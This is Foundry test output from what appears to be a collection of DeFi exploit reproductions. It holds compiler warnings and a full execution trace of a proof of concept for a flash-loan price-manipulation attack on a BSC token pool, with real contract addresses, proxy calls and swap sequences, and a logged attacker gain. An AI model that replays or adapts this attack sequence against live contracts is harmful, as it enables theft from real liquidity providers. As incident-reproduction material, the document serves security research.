Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 877.94ms
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-12/CCV_exp.sol:24:5:
   |
24 |     IERC20 WBNB = IERC20(0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:2436:1:
     |
2436 | interface WBNB {
     | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-12/CCV_exp.sol:45:31:
   |
45 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                               ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-12/CCV_exp.sol:45:47:
   |
45 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                               ^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-12/CCV_exp.sol:45:67:
   |
45 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                                                   ^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2023-12/CCV_exp.sol:45:88:
   |
45 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                                                                        ^^^^^^^^^^^^^^^^^^^

Warning (2072): Unused local variable.
  --> src/test/2023-12/CCV_exp.sol:47:10:
   |
47 |         (bool success1,) =
   |          ^^^^^^^^^^^^^

Warning (2072): Unused local variable.
  --> src/test/2023-12/CCV_exp.sol:50:10:
   |
50 |         (bool success2,) =
   |          ^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 557.89ms (3.44ms CPU time)

Ran 1 test for src/test/2023-12/CCV_exp.sol:ContractTest
[PASS] testExploit() (gas: 409915)
Logs:
  Attacker BUSD balance before attack:: 0
  Attacker BUSD balance before attack:: 3207626516877170623547

Traces:
  [9368] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 34739873 [3.473e7])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(proxy3717: [0x37177ccC66ef919894CeF37596BBebd76E7A40B2], "proxy3717")
    │   └─ ← [Return]
    ├─ [0] VM::label(proxye38d: [0xE38d7ff85bB801D35382eeF15eB8263F2c751ecd], "proxye38d")
    │   └─ ← [Return]
    └─ ← [Stop]

  [491215] ContractTest::testExploit()
    ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 26510000000000000000 [2.651e19]
    ├─ [10871] 0x55d398326f99059fF775485246999027B3197955::transfer(0x000000000000000000000000000000000000dEaD, 26510000000000000000 [2.651e19])
    │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x000000000000000000000000000000000000dEaD, value: 26510000000000000000 [2.651e19])
    │   ├─  storage changes:
    │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x0000000000000000000000000000000000000000000000016fe6708b439b0000 → 0
    │   │   @ 0xb34209a263f6c38fe55f099e9e70f9d67e93982480ff3234a5e0108028ad164d: 0x0000000000000000000000000000000000000000000016430943571e2555a322 → 0x0000000000000000000000000000000000000000000016447929c7a968f0a322
    │   └─ ← [Return] true
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_uint(key: "Attacker BUSD balance before attack:", val: 0)
    ├─ [24675] 0x89c27D81941708dBC9AA4d905443392cb4A8EF73::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [24562] 0x55d398326f99059fF775485246999027B3197955::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─  storage changes:
    │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   └─ ← [Return] true
    ├─ [399692] 0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476::flashLoan(0, 100000000000000000000000 [1e23], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x00)
    │   ├─ [396993] 0x85351262f7474Ebe23FfAcD633cf20A491F1325D::flashLoan(0, 100000000000000000000000 [1e23], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x00) [delegatecall]
    │   │   ├─ [8071] 0x55d398326f99059fF775485246999027B3197955::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 100000000000000000000000 [1e23])
    │   │   │   ├─ emit Transfer(from: 0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 100000000000000000000000 [1e23])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x82bcc9253272a2176c253e21a54ca24177e771a367828bd1251261eb930b899c: 0x000000000000000000000000000000000000000000001961380b07d7671954c3 → 0x0000000000000000000000000000000000000000000004343543268c709954c3
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x00000000000000000000000000000000000000000000152d02c7e14af6800000
    │   │   │   └─ ← [Return] true
    │   │   ├─ [362496] ContractTest::DPPFlashLoanCall(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 100000000000000000000000 [1e23], 0x00)
    │   │   │   ├─ [2670] 0x89c27D81941708dBC9AA4d905443392cb4A8EF73::balanceOf(proxy3717: [0x37177ccC66ef919894CeF37596BBebd76E7A40B2]) [staticcall]
    │   │   │   │   └─ ← [Return] 9057418516433752518165 [9.057e21]
    │   │   │   ├─ [124854] proxy3717::369baafe(0000000000000000000000000000000000000000000001eb00eea86fbf5f6e15)
    │   │   │   │   ├─ [119959] 0x18F6e45B017187E19E62BA0118621c9A2200Ce0C::369baafe(0000000000000000000000000000000000000000000001eb00eea86fbf5f6e15) [delegatecall]
    │   │   │   │   │   ├─ [24675] 0x89c27D81941708dBC9AA4d905443392cb4A8EF73::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 9057418516433752518165 [9.057e21])
    │   │   │   │   │   │   ├─ emit Approval(owner: proxy3717: [0x37177ccC66ef919894CeF37596BBebd76E7A40B2], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 9057418516433752518165 [9.057e21])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x4f0c61f40c58cf346d5c03d471c27ebcd45b490591ca2cde14c8f945025e1468: 0 → 0x0000000000000000000000000000000000000000000001eb00eea86fbf5f6e15
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [82207] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(9057418516433752518165 [9.057e21], 0, [0x89c27D81941708dBC9AA4d905443392cb4A8EF73, 0x55d398326f99059fF775485246999027B3197955], proxye38d: [0xE38d7ff85bB801D35382eeF15eB8263F2c751ecd], 1703740467 [1.703e9])
    │   │   │   │   │   │   ├─ [20506] 0x89c27D81941708dBC9AA4d905443392cb4A8EF73::transferFrom(proxy3717: [0x37177ccC66ef919894CeF37596BBebd76E7A40B2], 0x4da070F3c4295389ddFF6d4398650001e412cB39, 9057418516433752518165 [9.057e21])
    │   │   │   │   │   │   │   ├─ emit Approval(owner: proxy3717: [0x37177ccC66ef919894CeF37596BBebd76E7A40B2], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 0)
    │   │   │   │   │   │   │   ├─ emit Transfer(from: proxy3717: [0x37177ccC66ef919894CeF37596BBebd76E7A40B2], to: 0x4da070F3c4295389ddFF6d4398650001e412cB39, value: 9057418516433752518165 [9.057e21])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x85e20a54a430a51a75781af37fe5fddc77702b71d766b14df1067e0cab3ca864: 0x0000000000000000000000000000000000000000000001eb00eea86fbf5f6e15 → 0
    │   │   │   │   │   │   │   │   @ 0x4f0c61f40c58cf346d5c03d471c27ebcd45b490591ca2cde14c8f945025e1468: 0x0000000000000000000000000000000000000000000001eb00eea86fbf5f6e15 → 0
    │   │   │   │   │   │   │   │   @ 0x4ab81d6e72cc712c46be12a3aa6e43cec154a6027d0a40e608b497ed0c69a852: 0x0000000000000000000000000000000000000000000017ec97993ba9f462fcae → 0x0000000000000000000000000000000000000000000019d79887e419b3c26ac3
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(proxye38d: [0xE38d7ff85bB801D35382eeF15eB8263F2c751ecd]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 896254526292098922216 [8.962e20]
    │   │   │   │   │   │   ├─ [2893] 0x4da070F3c4295389ddFF6d4398650001e412cB39::getReserves() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 104740664590590730857512 [1.047e23], 112978784535369593584814 [1.129e23], 1703739969 [1.703e9]
    │   │   │   │   │   │   ├─ [670] 0x89c27D81941708dBC9AA4d905443392cb4A8EF73::balanceOf(0x4da070F3c4295389ddFF6d4398650001e412cB39) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 122036203051803346102979 [1.22e23]
    │   │   │   │   │   │   ├─ [45384] 0x4da070F3c4295389ddFF6d4398650001e412cB39::swap(7755763692447852804530 [7.755e21], 0, proxye38d: [0xE38d7ff85bB801D35382eeF15eB8263F2c751ecd], 0x)
    │   │   │   │   │   │   │   ├─ [10871] 0x55d398326f99059fF775485246999027B3197955::transfer(proxye38d: [0xE38d7ff85bB801D35382eeF15eB8263F2c751ecd], 7755763692447852804530 [7.755e21])
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x4da070F3c4295389ddFF6d4398650001e412cB39, to: proxye38d: [0xE38d7ff85bB801D35382eeF15eB8263F2c751ecd], value: 7755763692447852804530 [7.755e21])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0xae72bc408bf57e50b7063d58ddf07279d4f55b93dd6ad92546e32654e151c864: 0x0000000000000000000000000000000000000000000000309607b71a488db6e8 → 0x0000000000000000000000000000000000000000000001d506df79963ac3f09a
    │   │   │   │   │   │   │   │   │   @ 0x4ab81d6e72cc712c46be12a3aa6e43cec154a6027d0a40e608b497ed0c69a852: 0x00000000000000000000000000000000000000000000162e00b7d1514fa46c28 → 0x0000000000000000000000000000000000000000000014898fe00ed55d6e3276
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x4da070F3c4295389ddFF6d4398650001e412cB39) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 96984900898142878052982 [9.698e22]
    │   │   │   │   │   │   │   ├─ [670] 0x89c27D81941708dBC9AA4d905443392cb4A8EF73::balanceOf(0x4da070F3c4295389ddFF6d4398650001e412cB39) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 122036203051803346102979 [1.22e23]
    │   │   │   │   │   │   │   ├─ emit Sync(reserve0: 96984900898142878052982 [9.698e22], reserve1: 122036203051803346102979 [1.22e23])
    │   │   │   │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 0, amount1In: 9057418516433752518165 [9.057e21], amount0Out: 7755763692447852804530 [7.755e21], amount1Out: 0, to: proxye38d: [0xE38d7ff85bB801D35382eeF15eB8263F2c751ecd])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 9: 0x0000000000000000000000000000000430786775a45da24cf3d447b52f056292 → 0x00000000000000000000000000000004310d4218c06aacc324e12cb5623f6f20
    │   │   │   │   │   │   │   │   @ 10: 0x00000000000000000000000000000002955b392bb18b7c354f436076ff9788b3 → 0x0000000000000000000000000000000295db292500e8bcdb00cfab9acee46ff1
    │   │   │   │   │   │   │   │   @ 8: 0x658d02410000000017ec97993ba9f462fcae00000000162e00b7d1514fa46c28 → 0x658d02cb0000000019d79887e419b3c26ac30000000014898fe00ed55d6e3276
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(proxye38d: [0xE38d7ff85bB801D35382eeF15eB8263F2c751ecd]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 8652018218739951726746 [8.652e21]
    │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x4f0c61f40c58cf346d5c03d471c27ebcd45b490591ca2cde14c8f945025e1468: 0 → 0x0000000000000000000000000000000000000000000001eb00eea86fbf5f6e15
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Return]
    │   │   │   ├─ [86404] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(100000000000000000000000 [1e23], 0, [0x55d398326f99059fF775485246999027B3197955, 0x89c27D81941708dBC9AA4d905443392cb4A8EF73], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1703740107 [1.703e9])
    │   │   │   │   ├─ [6034] 0x55d398326f99059fF775485246999027B3197955::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x4da070F3c4295389ddFF6d4398650001e412cB39, 100000000000000000000000 [1e23])
    │   │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x4da070F3c4295389ddFF6d4398650001e412cB39, value: 100000000000000000000000 [1e23])
    │   │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 115792089237316195423570985008687907853269984665640563939457584007913129639935 [1.157e77])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x40efe119f1031eb281b5b195ed42e00327d441da2528f3ffaa1e7fa89579fa7f: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffead2fd381eb5097fffff
    │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x00000000000000000000000000000000000000000000152d02c7e14af6800000 → 0
    │   │   │   │   │   │   @ 0x4ab81d6e72cc712c46be12a3aa6e43cec154a6027d0a40e608b497ed0c69a852: 0x0000000000000000000000000000000000000000000014898fe00ed55d6e3276 → 0x0000000000000000000000000000000000000000000029b692a7f02053ee3276
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [2670] 0x89c27D81941708dBC9AA4d905443392cb4A8EF73::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   ├─ [893] 0x4da070F3c4295389ddFF6d4398650001e412cB39::getReserves() [staticcall]
    │   │   │   │   │   └─ ← [Return] 96984900898142878052982 [9.698e22], 122036203051803346102979 [1.22e23], 1703740107 [1.703e9]
    │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x4da070F3c4295389ddFF6d4398650001e412cB39) [staticcall]
    │   │   │   │   │   └─ ← [Return] 196984900898142878052982 [1.969e23]
    │   │   │   │   ├─ [68464] 0x4da070F3c4295389ddFF6d4398650001e412cB39::swap(0, 61875707862937167895417 [6.187e22], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   │   ├─ [53235] 0x89c27D81941708dBC9AA4d905443392cb4A8EF73::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 61875707862937167895417 [6.187e22])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x4da070F3c4295389ddFF6d4398650001e412cB39, to: 0x32A02A102Ca3ddB06CccEF17C1960Adde3c40DF0, value: 618757078629371678954 [6.187e20])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x4da070F3c4295389ddFF6d4398650001e412cB39, to: 0x32A02A102Ca3ddB06CccEF17C1960Adde3c40DF0, value: 1237514157258743357908 [1.237e21])
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x4da070F3c4295389ddFF6d4398650001e412cB39, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 60019436627049052858555 [6.001e22])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x4ab81d6e72cc712c46be12a3aa6e43cec154a6027d0a40e608b497ed0c69a852: 0x0000000000000000000000000000000000000000000019d79887e419b3c26ac3 → 0x000000000000000000000000000000000000000000000cbd4e962e4f3d47cf4a
    │   │   │   │   │   │   │   @ 12: 0x000000000000000000000000000000000000000000000110c7602155080b6c38 → 0x0000000000000000000000000000000000000000000001756850576d067a9ef6
    │   │   │   │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0 → 0x000000000000000000000000000000000000000000000cb5a9017fb2780b68bb
    │   │   │   │   │   │   │   @ 0x23b2375f179ab127cb5a3b39b159945513e394fe4a4673654843878f6d80d64b: 0x000000000000000000000000000000000000000000000110c7602155080b6c38 → 0x0000000000000000000000000000000000000000000001756850576d067a9ef6
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x4da070F3c4295389ddFF6d4398650001e412cB39) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 196984900898142878052982 [1.969e23]
    │   │   │   │   │   ├─ [670] 0x89c27D81941708dBC9AA4d905443392cb4A8EF73::balanceOf(0x4da070F3c4295389ddFF6d4398650001e412cB39) [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 60160495188866178207562 [6.016e22]
    │   │   │   │   │   ├─ emit Sync(reserve0: 196984900898142878052982 [1.969e23], reserve1: 60160495188866178207562 [6.016e22])
    │   │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 100000000000000000000000 [1e23], amount1In: 0, amount0Out: 0, amount1Out: 61875707862937167895417 [6.187e22], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 8: 0x658d02cb0000000019d79887e419b3c26ac30000000014898fe00ed55d6e3276 → 0x658d02cb000000000cbd4e962e4f3d47cf4a0000000029b692a7f02053ee3276
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ [670] 0x89c27D81941708dBC9AA4d905443392cb4A8EF73::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   └─ ← [Return] 60019436627049052858555 [6.001e22]
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(proxye38d: [0xE38d7ff85bB801D35382eeF15eB8263F2c751ecd]) [staticcall]
    │   │   │   │   └─ ← [Return] 8652018218739951726746 [8.652e21]
    │   │   │   ├─ [75401] proxye38d::b7da6a49(0000000000000000000000000000000000000000000001d506df79963ac3f09a)
    │   │   │   │   ├─ [70506] 0x238217598aBb32A3a031f6a9cccC86F5946A07e3::b7da6a49(0000000000000000000000000000000000000000000001d506df79963ac3f09a) [delegatecall]
    │   │   │   │   │   ├─ [24562] 0x55d398326f99059fF775485246999027B3197955::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 8652018218739951726746 [8.652e21])
    │   │   │   │   │   │   ├─ emit Approval(owner: proxye38d: [0xE38d7ff85bB801D35382eeF15eB8263F2c751ecd], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 8652018218739951726746 [8.652e21])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x976771c5740d431d4b0ad670671213e11a4ebb0e64ec6bafc4b9b6b0c3eeb4fc: 0 → 0x0000000000000000000000000000000000000000000001d506df79963ac3f09a
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   ├─ [35368] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(8652018218739951726746 [8.652e21], 0, [0x55d398326f99059fF775485246999027B3197955, 0x89c27D81941708dBC9AA4d905443392cb4A8EF73], proxy3717: [0x37177ccC66ef919894CeF37596BBebd76E7A40B2], 1703740467 [1.703e9])
    │   │   │   │   │   │   ├─ [6034] 0x55d398326f99059fF775485246999027B3197955::transferFrom(proxye38d: [0xE38d7ff85bB801D35382eeF15eB8263F2c751ecd], 0x4da070F3c4295389ddFF6d4398650001e412cB39, 8652018218739951726746 [8.652e21])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: proxye38d: [0xE38d7ff85bB801D35382eeF15eB8263F2c751ecd], to: 0x4da070F3c4295389ddFF6d4398650001e412cB39, value: 8652018218739951726746 [8.652e21])
    │   │   │   │   │   │   │   ├─ emit Approval(owner: proxye38d: [0xE38d7ff85bB801D35382eeF15eB8263F2c751ecd], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 0)
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x976771c5740d431d4b0ad670671213e11a4ebb0e64ec6bafc4b9b6b0c3eeb4fc: 0x0000000000000000000000000000000000000000000001d506df79963ac3f09a → 0
    │   │   │   │   │   │   │   │   @ 0xae72bc408bf57e50b7063d58ddf07279d4f55b93dd6ad92546e32654e151c864: 0x0000000000000000000000000000000000000000000001d506df79963ac3f09a → 0
    │   │   │   │   │   │   │   │   @ 0x4ab81d6e72cc712c46be12a3aa6e43cec154a6027d0a40e608b497ed0c69a852: 0x0000000000000000000000000000000000000000000029b692a7f02053ee3276 → 0x000000000000000000000000000000000000000000002b8b998769b68eb22310
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ [670] 0x89c27D81941708dBC9AA4d905443392cb4A8EF73::balanceOf(proxy3717: [0x37177ccC66ef919894CeF37596BBebd76E7A40B2]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   ├─ [893] 0x4da070F3c4295389ddFF6d4398650001e412cB39::getReserves() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 196984900898142878052982 [1.969e23], 60160495188866178207562 [6.016e22], 1703740107 [1.703e9]
    │   │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x4da070F3c4295389ddFF6d4398650001e412cB39) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 205636919116882829779728 [2.056e23]
    │   │   │   │   │   │   ├─ [19428] 0x4da070F3c4295389ddFF6d4398650001e412cB39::swap(0, 2525145034284378886990 [2.525e21], proxy3717: [0x37177ccC66ef919894CeF37596BBebd76E7A40B2], 0x)
    │   │   │   │   │   │   │   ├─ [4199] 0x89c27D81941708dBC9AA4d905443392cb4A8EF73::transfer(proxy3717: [0x37177ccC66ef919894CeF37596BBebd76E7A40B2], 2525145034284378886990 [2.525e21])
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x4da070F3c4295389ddFF6d4398650001e412cB39, to: proxy3717: [0x37177ccC66ef919894CeF37596BBebd76E7A40B2], value: 2525145034284378886990 [2.525e21])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0x4ab81d6e72cc712c46be12a3aa6e43cec154a6027d0a40e608b497ed0c69a852: 0x000000000000000000000000000000000000000000000cbd4e962e4f3d47cf4a → 0x000000000000000000000000000000000000000000000c346b28e06b6f4bbbfc
    │   │   │   │   │   │   │   │   │   @ 0x85e20a54a430a51a75781af37fe5fddc77702b71d766b14df1067e0cab3ca864: 0 → 0x000000000000000000000000000000000000000000000088e36d4de3cdfc134e
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x4da070F3c4295389ddFF6d4398650001e412cB39) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 205636919116882829779728 [2.056e23]
    │   │   │   │   │   │   │   ├─ [670] 0x89c27D81941708dBC9AA4d905443392cb4A8EF73::balanceOf(0x4da070F3c4295389ddFF6d4398650001e412cB39) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 57635350154581799320572 [5.763e22]
    │   │   │   │   │   │   │   ├─ emit Sync(reserve0: 205636919116882829779728 [2.056e23], reserve1: 57635350154581799320572 [5.763e22])
    │   │   │   │   │   │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 8652018218739951726746 [8.652e21], amount1In: 0, amount0Out: 0, amount1Out: 2525145034284378886990 [2.525e21], to: proxy3717: [0x37177ccC66ef919894CeF37596BBebd76E7A40B2])
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 8: 0x658d02cb000000000cbd4e962e4f3d47cf4a0000000029b692a7f02053ee3276 → 0x658d02cb000000000c346b28e06b6f4bbbfc000000002b8b998769b68eb22310
    │   │   │   │   │   │   │   └─ ← [Stop]
